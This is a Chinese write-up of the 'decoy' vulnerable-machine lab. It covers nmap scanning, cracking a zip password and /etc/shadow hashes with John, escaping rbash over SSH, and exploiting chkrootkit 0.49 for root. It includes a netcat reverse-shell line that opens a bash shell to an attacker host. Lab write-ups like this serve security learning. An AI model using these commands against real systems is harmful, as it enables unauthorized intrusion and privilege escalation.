decoy靶机复现

靶机设置

设置网卡ens33

设置靶机为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机ip为192.168.112.149

端口扫描

nmap 192.168.112.149 -p- -sV -O -Pn

访问浏览器

默认是8080,需要更改为80端口

下载好之后发现解压需要密码

破解密码

将该安装包放到kali中

进行密码破解

zip2john save.zip > save.zip.hash

john save.zip.hash

破解出密码:manuel

查看密码文件

cat /etc/shadow

爆破ssh密码

john ./etc/shadow --format=crypt

发现了账号:296640a3b825115a47b68fc44501c828

密码:server

ssh连接

连接成功

提权

尝试好多命令,发现都被rbash限制

ssh命令使用参数-t "bash --noprofile"可以强制分配伪终端,从而解决命令行受限问题,例如能够添加环境变量了。 重新连接ssh

ssh 296640a3b825115a47b68fc44501c828@192.168.112.149 -t "bash --noprofile"

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:$PATH

sudo -l

发现不存在免密操作

ls

cd SV-502/

ls

cd logs

ls

cat log.txt

发现pspy的日志文件。pspy是Linux系统的进程监控工具,可以记录进程的运行情况,包括启动进程的命令,一定程度上类似于详细版的history命令。

发现了曾经执行过解压chkrootkit-0.49.tar.gz文件的命令,也就是系统可能使用0.49版本的chkrootkit程序。

在msf查看相关的exp

find / -name *chkrootkit* 2>/dev/null

发现没有相关的值

前面发现的honeypot.decoy里面有AV Scan病毒扫描功能,可能集成了chkrootkit的后门检查能力

honeypot.decoy

5

for i in $(seq 1 300); do ps -ef | grep -v grep | grep chkrootkit; sleep 1; done;

查看几分钟的运行情况

发现root用户会执行0.49版本的chkrootkit程序,将前边的exp复制到当前目录下

searchsploit -m 33899.txt

查看文件

cat 33899.txt

当用户为非root用户,创建一个名为/tmp/update的可执行程序,内含提权代码;当用户为root用户,运行0.49版本的chkrootkit程序。

尝试进行反弹shell

echo nc -nv 192.168.112.130 9999 -e /bin/bash > /tmp/update

chmod +x /tmp/update

使用非root用户,也就是当前的296640a3b825115a47b68fc44501c828用户,执行命令 echo nc -nv 192.168.112.130 9999-e /bin/bash > /tmp/update 创建一个名为/tmp/update的可执行程序

/usr/bin/touch /dev/shm/STTY5246

honeypot.decoy

使用root用户,运行0.49版本的chkrootkit程序,也就是通过使用命令/usr/bin/touch /dev/shm/STTY5246,或者使用程序honeypot.decoy的功能5 Launch an AV Scan.,或者甚至什么也不做,来调用root用户运行0.49版本的chkrootkit程序。

等了一段时间后发现监听成功

已经为root用户

提权成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值